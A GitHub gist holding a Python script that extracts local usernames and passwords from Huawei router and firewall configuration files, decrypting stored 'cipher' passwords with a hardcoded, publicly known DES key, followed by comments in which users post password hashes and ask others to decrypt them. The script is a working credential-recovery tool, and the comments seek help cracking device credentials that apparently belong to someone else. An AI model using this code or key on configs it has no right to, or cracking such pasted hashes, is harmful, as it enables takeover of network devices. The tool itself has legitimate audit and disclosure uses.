-
-
Save staaldraad/605a5e40abaaa5915bc7 to your computer and use it in GitHub Desktop.
#!/usr/bin/python | |
""" | |
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files. | |
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with | |
a known key. Using this information, the script will decrypt credentials found in the config file. | |
Author: Etienne Stalmans (etienne@sensepost.com) | |
Version: 1.0 (12/01/2014) | |
""" | |
from Crypto.Cipher import DES | |
import sys | |
import binascii | |
def decode_char(c): | |
if c == 'a': | |
r = '?' | |
else: | |
r = c | |
return ord(r) - ord('!') | |
def ascii_to_binary(s): | |
assert len(s) == 24 | |
out = [0]*18 | |
i = 0 | |
j = 0 | |
for i in range(0, len(s), 4): | |
y = decode_char(s[i + 0]) | |
y = (y << 6) & 0xffffff | |
k = decode_char(s[i + 1]) | |
y = (y | k) & 0xffffff | |
y = (y << 6) & 0xffffff | |
k = decode_char(s[i + 2]) | |
y = (y | k) & 0xffffff | |
y = (y << 6) & 0xffffff | |
k = decode_char(s[i + 3]) | |
y = (y | k) & 0xffffff | |
out[j+2] = chr(y & 0xff) | |
out[j+1] = chr((y>>8) & 0xff) | |
out[j+0] = chr((y>>16) & 0xff) | |
j += 3 | |
return "".join(out) | |
def decrypt_password(p): | |
r = ascii_to_binary(p) | |
r = r[:16] | |
d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB) | |
r = d.decrypt(r) | |
return r.rstrip("\x00") | |
f_in = open(sys.argv[1],'r') | |
print "[*] Huawei Password Decryptor" | |
for line in f_in: | |
if ('local-user' not in line) or ('password' not in line): | |
continue | |
inp = line.split() | |
print "[*]-----------------------" | |
print "\t[+] User: %s"%inp[1] | |
print "\t[+] Password type: %s"%inp[3] | |
if inp[3] == "cipher": | |
print "\t[+] Cipher: %s"%inp[4] | |
print "\t[+] Password: %s"%decrypt_password(inp[4]) | |
else: | |
print "\t[+] Password: %s"%(inp[4]) |
Hi guys has anyone teste Encryption and Decryption on Huawei AX2 wifi6 routers? it seems the user is allways the same: admin.. just password on input menu login screen.. i have managed to analyze with F12 network traffic.. and it has 2 requests.. user_login_nonce, and user_login_proof which returns a RSAE : 010001 and RSA_N public modulus and RSA signature and Server signature keys , together with CSRF tokens for security protection.. on the user_login_nonce the password seems to be encripted.. and we can only see a SALT key info
hello, can anyone decript this?
local-user admin password irreversible-cipher $1c$xkWr)4aqh7$-)UV=T].KVW+B{Wg&JdD6tc.Nn</N1lsZWA$ysy5$
thanks
hello, can anyone decript this?
local-user root password irreversible-cipher g-1CeT32Y$..R"-F[fW<;W15,m-yn>.Y.-J>{wC@@
Q|,!+Q&G$
can anyone decrypt that:
Hi there! Any reason you're not decrypting it yourself?